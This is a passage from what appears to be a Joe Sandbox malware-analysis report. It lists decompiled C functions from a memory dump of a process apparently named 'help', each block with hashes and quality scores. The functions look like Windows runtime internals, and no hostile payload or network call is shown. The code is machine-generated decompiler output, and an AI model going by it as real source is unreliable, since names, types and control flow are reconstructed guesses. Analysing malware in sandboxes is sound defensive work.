                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 56191030040185ed0f6438c42824fac0b82cddf786a4d0b75b678780f7e21d1d
                            • Instruction ID: 3f535d2e07b8349cbf8ac33939d051fd17e88f00df434f8987c6da20e1cd313e
                            • Opcode Fuzzy Hash: 56191030040185ed0f6438c42824fac0b82cddf786a4d0b75b678780f7e21d1d
                            • Instruction Fuzzy Hash: 41414975A00315DFCB45CF98C890B99BBF1BF8A304F1980A9E908EB344D775A901CFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E03803D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                            				intOrPtr _v8;
                            				char _v12;
                            				signed short** _t33;
                            				short* _t38;
                            				intOrPtr* _t39;
                            				intOrPtr* _t41;
                            				signed short _t43;
                            				intOrPtr* _t47;
                            				intOrPtr* _t53;
                            				signed short _t57;
                            				intOrPtr _t58;
                            				signed short _t60;
                            				signed short* _t61;
                            
                            				_t47 = __ecx;
                            				_t61 = __edx;
                            				_t60 = ( *__ecx & 0x0000ffff) + 2;
                            				if(_t60 > 0xfffe) {
                            					L22:
                            					return 0xc0000106;
                            				}
                            				if(__edx != 0) {
                            					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                            						L5:
                            						E037D7B60(0, _t61, 0x37a11c4);
                            						_v12 =  *_t47;
                            						_v12 = _v12 + 0xfff8;
                            						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                            						E037D7B60(0xfff8, _t61,  &_v12);
                            						_t33 = _a8;
                            						if(_t33 != 0) {
                            							 *_t33 = _t61;
                            						}
                            						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                            						_t53 = _a12;
                            						if(_t53 != 0) {
                            							_t57 = _t61[2];
                            							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                            							while(_t38 >= _t57) {
                            								if( *_t38 == 0x5c) {
                            									_t41 = _t38 + 2;
                            									if(_t41 == 0) {
                            										break;
                            									}
                            									_t58 = 0;
                            									if( *_t41 == 0) {
                            										L19:
                            										 *_t53 = _t58;
                            										goto L7;
                            									}
                            									 *_t53 = _t41;
                            									goto L7;
                            								}
                            								_t38 = _t38 - 2;
                            							}
                            							_t58 = 0;
                            							goto L19;
                            						} else {
                            							L7:
                            							_t39 = _a16;
                            							if(_t39 != 0) {
                            								 *_t39 = 0;
                            								 *((intOrPtr*)(_t39 + 4)) = 0;
                            								 *((intOrPtr*)(_t39 + 8)) = 0;
                            								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                            							}
                            							return 0;
                            						}
                            					}
                            					_t61 = _a4;
                            					if(_t61 != 0) {
                            						L3:
                            						_t43 = L037E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                            						_t61[2] = _t43;
                            						if(_t43 == 0) {
                            							return 0xc0000017;
                            						}
                            						_t61[1] = _t60;
                            						 *_t61 = 0;
                            						goto L5;
                            					}
                            					goto L22;
                            				}
                            				_t61 = _a4;
                            				if(_t61 == 0) {
                            					return 0xc000000d;
                            				}
                            				goto L3;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 08e8ecb1582c45be7ae610bb9ac34a78c4f9d730d80b0e60e7d8d77b004c55eb
                            • Instruction ID: 065932942d29953a0f4f56b68190729362416f90ecdd0a2bdbf055c952c8b85a
                            • Opcode Fuzzy Hash: 08e8ecb1582c45be7ae610bb9ac34a78c4f9d730d80b0e60e7d8d77b004c55eb
                            • Instruction Fuzzy Hash: B731B03AA01615DFCB74CFA9C841A7ABBF5EF46700B0980EAE855CB790E7B0D840C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E037EC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                            				signed int* _v8;
                            				char _v16;
                            				void* __ebx;
                            				void* __edi;
                            				signed char _t33;
                            				signed char _t43;
                            				signed char _t48;
                            				signed char _t62;
                            				void* _t63;
                            				intOrPtr _t69;
                            				intOrPtr _t71;
                            				unsigned int* _t82;
                            				void* _t83;
                            
                            				_t80 = __ecx;
                            				_t82 = __edx;
                            				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                            				_t62 = _t33 >> 0x00000001 & 0x00000001;
                            				if((_t33 & 0x00000001) != 0) {
                            					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                            					if(E037E7D50() != 0) {
                            						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            					} else {
                            						_t43 = 0x7ffe0386;
                            					}
                            					if( *_t43 != 0) {
                            						_t43 = E03898D34(_v8, _t80);
                            					}
                            					E037E2280(_t43, _t82);
                            					if( *((char*)(_t80 + 0xdc)) == 0) {
                            						E037DFFB0(_t62, _t80, _t82);
                            						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                            						_t30 = _t80 + 0xd0; // 0xd0
                            						_t83 = _t30;
                            						E03898833(_t83,  &_v16);
                            						_t81 = _t80 + 0x90;
                            						E037DFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                            						_t63 = 0;
                            						_push(0);
                            						_push(_t83);
                            						_t48 = E0380B180();
                            						if(_a4 != 0) {
                            							E037E2280(_t48, _t81);
                            						}
                            					} else {
                            						_t69 = _v8;
                            						_t12 = _t80 + 0x98; // 0x98
                            						_t13 = _t69 + 0xc; // 0x575651ff
                            						E037EBB2D(_t13, _t12);
                            						_t71 = _v8;
                            						_t15 = _t80 + 0xb0; // 0xb0
                            						_t16 = _t71 + 8; // 0x8b000cc2
                            						E037EBB2D(_t16, _t15);
                            						E037EB944(_v8, _t62);
                            						 *((char*)(_t80 + 0xdc)) = 0;
                            						E037DFFB0(0, _t80, _t82);
                            						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                            						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                            						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                            						 *(_t80 + 0xde) = 0;
                            						if(_a4 == 0) {
                            							_t25 = _t80 + 0x90; // 0x90
                            							E037DFFB0(0, _t80, _t25);
                            						}
                            						_t63 = 1;
                            					}
                            					return _t63;
                            				}
                            				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                            				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                            				if(_a4 == 0) {
                            					_t24 = _t80 + 0x90; // 0x90
                            					E037DFFB0(0, __ecx, _t24);
                            				}
                            				return 0;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                            • Instruction ID: 2263e8e6cc5d185eca40aeb77a7178952d6595e5fb2b05c77819a76c452de8d1
                            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                            • Instruction Fuzzy Hash: 1D31097A60168BFED705EBF4C484BE9FB68BF4A204F08419AD41C9F301DB345955DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E03847016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                            				signed int _v8;
                            				char _v588;
                            				intOrPtr _v592;
                            				intOrPtr _v596;
                            				signed short* _v600;
                            				char _v604;
                            				short _v606;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed short* _t55;
                            				void* _t56;
                            				signed short* _t58;
                            				signed char* _t61;
                            				char* _t68;
                            				void* _t69;
                            				void* _t71;
                            				void* _t72;
                            				signed int _t75;
                            
                            				_t64 = __edx;
                            				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                            				_v8 =  *0x38bd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                            				_t55 = _a16;
                            				_v606 = __ecx;
                            				_t71 = 0;
                            				_t58 = _a12;
                            				_v596 = __edx;
                            				_v600 = _t58;
                            				_t68 =  &_v588;
                            				if(_t58 != 0) {
                            					_t71 = ( *_t58 & 0x0000ffff) + 2;
                            					if(_t55 != 0) {
                            						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                            					}
                            				}
                            				_t8 = _t71 + 0x2a; // 0x28
                            				_t33 = _t8;
                            				_v592 = _t8;
                            				if(_t71 <= 0x214) {
                            					L6:
                            					 *((short*)(_t68 + 6)) = _v606;
                            					if(_t64 != 0xffffffff) {
                            						asm("cdq");
                            						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                            						 *((char*)(_t68 + 0x28)) = _a4;
                            						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                            						 *((char*)(_t68 + 0x29)) = _a8;
                            						if(_t71 != 0) {
                            							_t22 = _t68 + 0x2a; // 0x2a
                            							_t64 = _t22;
                            							E03846B4C(_t58, _t22, _t71,  &_v604);
                            							if(_t55 != 0) {
                            								_t25 = _v604 + 0x2a; // 0x2a
                            								_t64 = _t25 + _t68;
                            								E03846B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                            							}
                            							if(E037E7D50() == 0) {
                            								_t61 = 0x7ffe0384;
                            							} else {
                            								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            							}
                            							_push(_t68);
                            							_push(_v592 + 0xffffffe0);
                            							_push(0x402);
                            							_push( *_t61 & 0x000000ff);
                            							E03809AE0();
                            						}
                            					}
                            					_t35 =  &_v588;
                            					if( &_v588 != _t68) {
                            						_t35 = L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                            					}
                            					L16:
                            					_pop(_t69);
                            					_pop(_t72);
                            					_pop(_t56);
                            					return E0380B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                            				}
                            				_t68 = L037E4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                            				if(_t68 == 0) {
                            					goto L16;
                            				} else {
                            					_t58 = _v600;
                            					_t64 = _v596;
                            					goto L6;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 15e9f13583de2888891cdc7c16c2d1a1fedf6b3bb372310cce9023bbbdc72f1c
                            • Instruction ID: d76fe26116e1f366d644e65d00e5a28ef169cfe62e32550c9188fe91c5934238
                            • Opcode Fuzzy Hash: 15e9f13583de2888891cdc7c16c2d1a1fedf6b3bb372310cce9023bbbdc72f1c
                            • Instruction Fuzzy Hash: 7931C6766047959BC321DF68CC40A6AB3E5FFC8700F044A69F8A5DBA90E730E904C7A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E037FA70E(intOrPtr* __ecx, char* __edx) {
                            				unsigned int _v8;
                            				intOrPtr* _v12;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* _t16;
                            				intOrPtr _t17;
                            				intOrPtr _t28;
                            				char* _t33;
                            				intOrPtr _t37;
                            				intOrPtr _t38;
                            				void* _t50;
                            				intOrPtr _t52;
                            
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t52 =  *0x38b7b10; // 0x8
                            				_t33 = __edx;
                            				_t48 = __ecx;
                            				_v12 = __ecx;
                            				if(_t52 == 0) {
                            					 *0x38b7b10 = 8;
                            					 *0x38b7b14 = 0x38b7b0c;
                            					 *0x38b7b18 = 1;
                            					L6:
                            					_t2 = _t52 + 1; // 0x9
                            					E037FA990(0x38b7b10, _t2, 7);
                            					asm("bts ecx, eax");
                            					 *_t48 = _t52;
                            					 *_t33 = 1;
                            					L3:
                            					_t16 = 0;
                            					L4:
                            					return _t16;
                            				}
                            				_t17 = L037FA840(__edx, __ecx, __ecx, _t52, 0x38b7b10, 1, 0);
                            				if(_t17 == 0xffffffff) {
                            					_t37 =  *0x38b7b10; // 0x8
                            					_t3 = _t37 + 0x27; // 0x2f
                            					__eflags = _t3 >> 5 -  *0x38b7b18; // 0x1
                            					if(__eflags > 0) {
                            						_t38 =  *0x38b7b9c; // 0x0
                            						_t4 = _t52 + 0x27; // 0x2f
                            						_v8 = _t4 >> 5;
                            						_t50 = L037E4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                            						__eflags = _t50;
                            						if(_t50 == 0) {
                            							_t16 = 0xc0000017;
                            							goto L4;
                            						}
                            						 *0x38b7b18 = _v8;
                            						_t8 = _t52 + 7; // 0xf
                            						E0380F3E0(_t50,  *0x38b7b14, _t8 >> 3);
                            						_t28 =  *0x38b7b14; // 0x77de7b0c
                            						__eflags = _t28 - 0x38b7b0c;
                            						if(_t28 != 0x38b7b0c) {
                            							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                            						}
                            						_t9 = _t52 + 8; // 0x10
                            						 *0x38b7b14 = _t50;
                            						_t48 = _v12;
                            						 *0x38b7b10 = _t9;
                            						goto L6;
                            					}
                            					 *0x38b7b10 = _t37 + 8;
                            					goto L6;
                            				}
                            				 *__ecx = _t17;
                            				 *_t33 = 0;
                            				goto L3;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0222bae3e8ea7485af6959b7dfe75818a591ecd6f98454ed270413c2b99ff552
                            • Instruction ID: 8e4df87aed097bc7de646d27d3608eb63461127e7b03358e4748a76c0a6006fd
                            • Opcode Fuzzy Hash: 0222bae3e8ea7485af6959b7dfe75818a591ecd6f98454ed270413c2b99ff552
                            • Instruction Fuzzy Hash: 54319AB16207029FCB15DB58D881F6AB7B9FB85610F14099AF109DB744E3B0A901CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 95%
                            			E037CAA16(signed short* __ecx) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				signed short _v16;
                            				intOrPtr _v20;
                            				signed short _v24;
                            				signed short _v28;
                            				void* _v32;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr _t25;
                            				signed short _t38;
                            				signed short* _t42;
                            				signed int _t44;
                            				signed short* _t52;
                            				signed short _t53;
                            				signed int _t54;
                            
                            				_v8 =  *0x38bd360 ^ _t54;
                            				_t42 = __ecx;
                            				_t44 =  *__ecx & 0x0000ffff;
                            				_t52 =  &(__ecx[2]);
                            				_t51 = _t44 + 2;
                            				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                            					L4:
                            					_t25 =  *0x38b7b9c; // 0x0
                            					_t53 = L037E4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                            					__eflags = _t53;
                            					if(_t53 == 0) {
                            						L3:
                            						return E0380B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                            					} else {
                            						E0380F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                            						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                            						L2:
                            						_t51 = 4;
                            						if(L037D6C59(_t53, _t51, _t58) != 0) {
                            							_t28 = E037F5E50(0x37ac338, 0, 0,  &_v32);
                            							__eflags = _t28;
                            							if(_t28 == 0) {
                            								_t38 = ( *_t42 & 0x0000ffff) + 2;
                            								__eflags = _t38;
                            								_v24 = _t53;
                            								_v16 = _t38;
                            								_v20 = 0;
                            								_v12 = 0;
                            								E037FB230(_v32, _v28, 0x37ac2d8, 1,  &_v24);
                            								_t28 = E037CF7A0(_v32, _v28);
                            							}
                            							__eflags = _t53 -  *_t52;
                            							if(_t53 !=  *_t52) {
                            								_t28 = L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                            							}
                            						}
                            						goto L3;
                            					}
                            				}
                            				_t53 =  *_t52;
                            				_t44 = _t44 >> 1;
                            				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                            				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                            					goto L4;
                            				}
                            				goto L2;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 993d2c16da7d0b5c871e5965951816b07d056f7e80ee98fc7acf06dd8ff1ba16
                            • Instruction ID: 56842be877eed62d071835ef129e4800b61c9ca83c2a7f2ab1ec7653fd6bf412
                            • Opcode Fuzzy Hash: 993d2c16da7d0b5c871e5965951816b07d056f7e80ee98fc7acf06dd8ff1ba16
                            • Instruction Fuzzy Hash: 7331C271A00669AFCF15DFA5CD81A7EB7B8EF44700B0540ADF901EB240E7749A50DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 97%
                            			E037F61A0(signed int* __ecx) {
                            				intOrPtr _v8;
                            				char _v12;
                            				intOrPtr* _v16;
                            				intOrPtr _v20;
                            				intOrPtr _t30;
                            				intOrPtr _t31;
                            				void* _t32;
                            				intOrPtr _t33;
                            				intOrPtr _t37;
                            				intOrPtr _t49;
                            				signed int _t51;
                            				intOrPtr _t52;
                            				signed int _t54;
                            				void* _t59;
                            				signed int* _t61;
                            				intOrPtr* _t64;
                            
                            				_t61 = __ecx;
                            				_v12 = 0;
                            				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                            				_v16 = __ecx;
                            				_v8 = 0;
                            				if(_t30 == 0) {
                            					L6:
                            					_t31 = 0;
                            					L7:
                            					return _t31;
                            				}
                            				_t32 = _t30 + 0x5d8;
                            				if(_t32 == 0) {
                            					goto L6;
                            				}
                            				_t59 = _t32 + 0x30;
                            				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                            					goto L6;
                            				}
                            				if(__ecx != 0) {
                            					 *((intOrPtr*)(__ecx)) = 0;
                            					 *((intOrPtr*)(__ecx + 4)) = 0;
                            				}
                            				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                            					_t51 =  *(_t32 + 0x10);
                            					_t33 = _t32 + 0x10;
                            					_v20 = _t33;
                            					_t54 =  *(_t33 + 4);
                            					if((_t51 | _t54) == 0) {
                            						_t37 = E037F5E50(0x37a67cc, 0, 0,  &_v12);
                            						if(_t37 != 0) {
                            							goto L6;
                            						}
                            						_t52 = _v8;
                            						asm("lock cmpxchg8b [esi]");
                            						_t64 = _v16;
                            						_t49 = _t37;
                            						_v20 = 0;
                            						if(_t37 == 0) {
                            							if(_t64 != 0) {
                            								 *_t64 = _v12;
                            								 *((intOrPtr*)(_t64 + 4)) = _t52;
                            							}
                            							E03899D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                            							_t31 = 1;
                            							goto L7;
                            						}
                            						E037CF7C0(_t52, _v12, _t52, 0);
                            						if(_t64 != 0) {
                            							 *_t64 = _t49;
                            							 *((intOrPtr*)(_t64 + 4)) = _v20;
                            						}
                            						L12:
                            						_t31 = 1;
                            						goto L7;
                            					}
                            					if(_t61 != 0) {
                            						 *_t61 = _t51;
                            						_t61[1] = _t54;
                            					}
                            					goto L12;
                            				} else {
                            					goto L6;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ea89dfb1a43c017634042acc9a821f0330da8f4f7841c21c283a18e67bf11730
                            • Instruction ID: e7e1f4ab93d7d1e22708d15731eb661e778c5174814f1eba14607f84c2bf4b4f
                            • Opcode Fuzzy Hash: ea89dfb1a43c017634042acc9a821f0330da8f4f7841c21c283a18e67bf11730
                            • Instruction Fuzzy Hash: C43157B16057018FD360DF59C850B2AF7E5BB88B10F0949ADFAA8DB351E7B0E804CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E03808EC7(void* __ecx, void* __edx) {
                            				signed int _v8;
                            				signed int* _v16;
                            				intOrPtr _v20;
                            				signed int* _v24;
                            				char* _v28;
                            				signed int* _v32;
                            				intOrPtr _v36;
                            				signed int* _v40;
                            				signed int* _v44;
                            				signed int* _v48;
                            				intOrPtr _v52;
                            				signed int* _v56;
                            				signed int* _v60;
                            				signed int* _v64;
                            				intOrPtr _v68;
                            				signed int* _v72;
                            				char* _v76;
                            				signed int* _v80;
                            				signed int _v84;
                            				signed int* _v88;
                            				intOrPtr _v92;
                            				signed int* _v96;
                            				intOrPtr _v100;
                            				signed int* _v104;
                            				signed int* _v108;
                            				char _v140;
                            				signed int _v144;
                            				signed int _v148;
                            				signed int* _v152;
                            				char _v156;
                            				signed int* _v160;
                            				char _v164;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* _t67;
                            				intOrPtr _t70;
                            				void* _t71;
                            				void* _t72;
                            				signed int _t73;
                            
                            				_t69 = __edx;
                            				_v8 =  *0x38bd360 ^ _t73;
                            				_t48 =  *[fs:0x30];
                            				_t72 = __edx;
                            				_t71 = __ecx;
                            				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                            					_t48 = E037F4E70(0x38b86e4, 0x3809490, 0, 0);
                            					if( *0x38b53e8 > 5 && E03808F33(0x38b53e8, 0, 0x2000) != 0) {
                            						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                            						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                            						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                            						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                            						_v108 =  &_v84;
                            						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                            						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                            						_v76 =  &_v156;
                            						_t70 = 8;
                            						_v60 =  &_v144;
                            						_t67 = 4;
                            						_v44 =  &_v148;
                            						_v152 = 0;
                            						_v160 = 0;
                            						_v104 = 0;
                            						_v100 = 2;
                            						_v96 = 0;
                            						_v88 = 0;
                            						_v80 = 0;
                            						_v72 = 0;
                            						_v68 = _t70;
                            						_v64 = 0;
                            						_v56 = 0;
                            						_v52 = 0x38b53e8;
                            						_v48 = 0;
                            						_v40 = 0;
                            						_v36 = 0x38b53e8;
                            						_v32 = 0;
                            						_v28 =  &_v164;
                            						_v24 = 0;
                            						_v20 = _t70;
                            						_v16 = 0;
                            						_t69 = 0x37abc46;
                            						_t48 = E03847B9C(0x38b53e8, 0x37abc46, _t67, 0x38b53e8, _t70,  &_v140);
                            					}
                            				}
                            				return E0380B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b3fa09895110660ec9a67ae60bc9d10c5b3d97446b21fcc5a5127ff0c6c256cc
                            • Instruction ID: c7502e23662e2c6db9497a039b6b1a11d5e05ca45b6808cf89ce5ea92fe9dc97
                            • Opcode Fuzzy Hash: b3fa09895110660ec9a67ae60bc9d10c5b3d97446b21fcc5a5127ff0c6c256cc
                            • Instruction Fuzzy Hash: 28419DB1D007189FDB60CFAAD981AADFBF8BB49310F5041AEE519E7240E7745A84CF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 58%
                            			E03804A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                            				signed int _v8;
                            				signed int* _v12;
                            				char _v13;
                            				signed int _v16;
                            				char _v21;
                            				signed int* _v24;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t29;
                            				signed int* _t32;
                            				signed int* _t41;
                            				signed int _t42;
                            				void* _t43;
                            				intOrPtr* _t51;
                            				void* _t52;
                            				signed int _t53;
                            				signed int _t58;
                            				void* _t59;
                            				signed int _t60;
                            				signed int _t62;
                            
                            				_t49 = __edx;
                            				_t62 = (_t60 & 0xfffffff8) - 0xc;
                            				_t26 =  *0x38bd360 ^ _t62;
                            				_v8 =  *0x38bd360 ^ _t62;
                            				_t41 = __ecx;
                            				_t51 = __edx;
                            				_v12 = __ecx;
                            				if(_a4 == 0) {
                            					if(_a8 != 0) {
                            						goto L1;
                            					}
                            					_v13 = 1;
                            					E037E2280(_t26, 0x38b8608);
                            					_t58 =  *_t41;
                            					if(_t58 == 0) {
                            						L11:
                            						E037DFFB0(_t41, _t51, 0x38b8608);
                            						L2:
                            						 *0x38bb1e0(_a4, _a8);
                            						_t42 =  *_t51();
                            						if(_t42 == 0) {
                            							_t29 = 0;
                            							L5:
                            							_pop(_t52);
                            							_pop(_t59);
                            							_pop(_t43);
                            							return E0380B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                            						}
                            						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                            						if(_v21 != 0) {
                            							_t53 = 0;
                            							E037E2280(_t28, 0x38b8608);
                            							_t32 = _v24;
                            							if( *_t32 == _t58) {
                            								 *_t32 = _t42;
                            								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                            								if(_t58 != 0) {
                            									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                            									asm("sbb edi, edi");
                            									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                            								}
                            							}
                            							E037DFFB0(_t42, _t53, 0x38b8608);
                            							if(_t53 != 0) {
                            								L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                            							}
                            						}
                            						_t29 = _t42;
                            						goto L5;
                            					}
                            					if( *((char*)(_t58 + 0x40)) != 0) {
                            						L10:
                            						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                            						E037DFFB0(_t41, _t51, 0x38b8608);
                            						_t29 = _t58;
                            						goto L5;
                            					}
                            					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                            					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                            						goto L11;
                            					}
                            					goto L10;
                            				}
                            				L1:
                            				_v13 = 0;
                            				_t58 = 0;
                            				goto L2;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
